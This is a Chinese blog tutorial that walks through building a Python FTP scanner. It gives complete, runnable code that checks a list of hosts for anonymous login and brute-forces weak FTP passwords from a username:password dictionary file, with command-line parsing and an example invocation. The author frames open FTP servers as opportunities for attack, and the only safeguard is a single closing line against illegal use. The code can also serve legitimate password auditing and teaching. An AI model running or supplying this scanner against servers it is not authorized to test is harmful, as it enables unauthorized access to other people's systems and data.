您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關(guān)如何使用Python實(shí)現(xiàn)FTP弱口令掃描器的內(nèi)容。小編覺(jué)得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過(guò)來(lái)看看吧。
FTP服務(wù)器
FTP服務(wù)器是在互聯(lián)網(wǎng)上提供文件存儲(chǔ)和訪問(wèn)服務(wù)的計(jì)算機(jī),它們依照FTP協(xié)議提供服務(wù)。FTP是File Transfer Protocol(文件傳輸協(xié)議)的縮寫(xiě)。顧名思義,就是專(zhuān)門(mén)用來(lái)傳輸文件的協(xié)議,簡(jiǎn)單地說(shuō),支持FTP協(xié)議的服務(wù)器就是FTP服務(wù)器
FTP是僅基于TCP的服務(wù),不支持UDP(想想也是,傳輸文件,肯定要穩(wěn)定可靠,建立連接,所以不支持UDP)。與眾不同的是FTP使用2個(gè)端口,一個(gè)數(shù)據(jù)端口,一個(gè)命令端口(也叫控制端口)。通常來(lái)說(shuō)這兩個(gè)端口分別是21(命名端口)和20(數(shù)據(jù)端口)。但由于FTP工作方式的不同,數(shù)據(jù)端口并不總是20.這就是主動(dòng)與被動(dòng)FTP的最大不同之處。
主動(dòng)FTP
FTP服務(wù)器的控制端口是21,數(shù)據(jù)端口是20,所以在做靜態(tài)映射的時(shí)候只需開(kāi)放21端口即可,他會(huì)用20端口和客戶(hù)端主動(dòng)發(fā)起連接
被動(dòng)FTP
服務(wù)器的控制端口是21,數(shù)據(jù)端口是隨機(jī)的,且是客戶(hù)端去連接對(duì)應(yīng)的數(shù)據(jù)端口,所以在做靜態(tài)映射的話只開(kāi)放21端口不可以的
FTP掃描的實(shí)現(xiàn)方案
掃描匿名FTP
FTP匿名登陸的掃描主要應(yīng)用與批量掃描中,單獨(dú)針對(duì)一個(gè)FTP服務(wù)器進(jìn)行掃描的話成功率比較小。很多網(wǎng)站都開(kāi)放FTP服務(wù)方便用戶(hù)下載資源(這個(gè)允許匿名登陸不足為奇),更瘋狂的是網(wǎng)站管理人員為了方便網(wǎng)站訪問(wèn)軟件的更新也開(kāi)放了FTP匿名登陸,這樣就給了我們很多機(jī)會(huì),尤其后者的服務(wù)器很容易受到攻擊
掃描FTP弱口令
弱口令掃描其實(shí)就是暴力破解,不過(guò)我們只是掃描一些簡(jiǎn)單的密碼組合,并不是所有可能的密碼組合
步驟
FTP匿名掃描器的實(shí)現(xiàn)
這里需要用到Python的 ftplib 庫(kù)中的FTP這個(gè)類(lèi),這個(gè)類(lèi)實(shí)現(xiàn)了FTP客戶(hù)端的大多數(shù)功能,比如連接FTP服務(wù)器、查看服務(wù)器中的文件、上傳、下載文件等功能,詳細(xì)用法可以查看API,接下來(lái)我們首先定義 anonScan(hostname) 這個(gè)函數(shù)以實(shí)現(xiàn)掃描可匿名登陸的FTP服務(wù)器。代碼如下:
def anonScan(hostname): # 參數(shù)是主機(jī)名 try: with FTP(hostname) as ftp: # 創(chuàng)建FTP對(duì)象 ftp.login() # FTP匿名登陸 print("\n[*]" + str(hostname) + " FTP Anonymous login successful!") return True except Exception as e: # 拋出異常表示匿名登陸失敗 print("\n[-]" + str(hostname) + " FTP Anonymous login failure!") return False
代碼很簡(jiǎn)短,注釋也寫(xiě)的很清楚。這里還是說(shuō)一下函數(shù)的思路,首先用主機(jī)名構(gòu)造了一個(gè)FTP對(duì)象(即ftp),然后用ftp調(diào)用不帶參數(shù)的login()函數(shù)即表示要匿名登陸這個(gè)FTP服務(wù)器,如果登陸過(guò)程中沒(méi)有產(chǎn)生異常,則表明匿名登陸成功,否則匿名登陸失敗
FTP弱口令的掃描
FTP弱口令掃描依賴(lài)于用戶(hù)名和密碼字典,密碼字典 下載 ,下載之后我們將其命名為 pwd.txt
接下來(lái)針對(duì)字典中的格式來(lái)實(shí)現(xiàn)FTP弱口令掃描,創(chuàng)建代碼文件 ftpScanner.py ,代碼如下:
def vlcLogin(hostname, pwdFile): # Parameters (hostname, dictionary file) try: with open(pwdFile, 'r') as pf: # Open dictionary file for line in pf.readlines(): userName = line.split(':')[0] # Fetch username passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password print('[+] Trying: ' + userName + ':' + passWord) try: with FTP(hostname) as ftp: ftp.login(userName, passWord) print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \ userName + ':' + passWord) return (userName, passWord) except Exception as e: # Continue trying other usernames and passwords pass except IOError as e: print('Error: the password file does not exist!') print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!') return (None,None)
這段代碼其實(shí)就是循環(huán)從字典中讀取用戶(hù)名和密碼并嘗試登陸,登陸成功則表明找到用戶(hù)名和密碼。由于這個(gè)函數(shù)將主機(jī)名定義成了可以用 , 分割的字符串。找到密碼并不會(huì)終止程序,而是會(huì)繼續(xù)掃描其他主機(jī)的弱口令,直到所有的主機(jī)都掃描一遍
命令行解析
至此,F(xiàn)TP掃描器幾乎已經(jīng)完成了,現(xiàn)在我們要做的是讓我們的腳本可以處理命令行輸入,以控制掃描哪些主機(jī)。命令行參數(shù)我們將用到Python中的 argparse 庫(kù)。
parser = argparse.ArgumentParser(description='FTP Scanner') parser.add_argument('-H',dest='hostName',help='The host list with ","space') parser.add_argument('-f',dest='pwdFile',help='Password dictionary file') options = None try: options = parser.parse_args() except: print(parser.parse_args(['-h'])) exit(0) hostNames = str(options.hostName).split(',') pwdFile = options.pwdFile
整合全部代碼
# -*- coding: utf-8 -*- from ftplib import * import argparse import time # Anonymous login scan def anonScan(hostname): # The parameter is the host name try: with FTP(hostname) as ftp: # Create FTP object ftp.login() # FTP anonymous login print("\n[*]" + str(hostname) + " FTP Anonymous login successful!") return True except Exception as e: # Throwing an exception indicates that the anonymous login failed print("\n[-]" + str(hostname) + " FTP Anonymous login failure!") return False # Brute force def vlcLogin(hostname, pwdFile): # Parameters (hostname, dictionary file) try: with open(pwdFile, 'r') as pf: # Open dictionary file for line in pf.readlines(): userName = line.split(':')[0] # Fetch username passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password print('[+] Trying: ' + userName + ':' + passWord) try: with FTP(hostname) as ftp: ftp.login(userName, passWord) print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \ userName + ':' + passWord) return (userName, passWord) except Exception as e: # Continue trying other usernames and passwords pass except IOError as e: print('Error: the password file does not exist!') print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!') return (None,None) def main(): parser = argparse.ArgumentParser(description='FTP Scanner') parser.add_argument('-H',dest='hostName',help='The host list with ","space') parser.add_argument('-f',dest='pwdFile',help='Password dictionary file') options = None try: options = parser.parse_args() except: print(parser.parse_args(['-h'])) exit(0) hostNames = str(options.hostName).split(',') pwdFile = options.pwdFile if hostNames == ['None']: print(parser.parse_args(['-h'])) exit(0) for hostName in hostNames: username = None password = None if anonScan(hostName) == True: print('Host: ' + hostName + ' Can anonymously!') elif pwdFile != None: (username,password) = vlcLogin(hostName,pwdFile) if password != None: print('\n[+] Host: ' + hostName + 'Username: ' + username + \ 'Password: ' + password) print('\n[*]-------------------Scan End!--------------------[*]') if __name__ == '__main__': main()
測(cè)試掃描
至此就可以測(cè)試我們的FTP弱口令掃描器了,在命令行中輸入
python ftpScanner.py -H 127.0.0.1 -f pwd.txt
因?yàn)槲冶镜夭](méi)有開(kāi)啟ftp服務(wù),所以掃描不成功,大家可以嘗試在服務(wù)器上開(kāi)放FTP服務(wù),然后進(jìn)行測(cè)試,絕對(duì)不能用于非法用途
感謝各位的閱讀!關(guān)于“如何使用Python實(shí)現(xiàn)FTP弱口令掃描器”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,讓大家可以學(xué)到更多知識(shí),如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。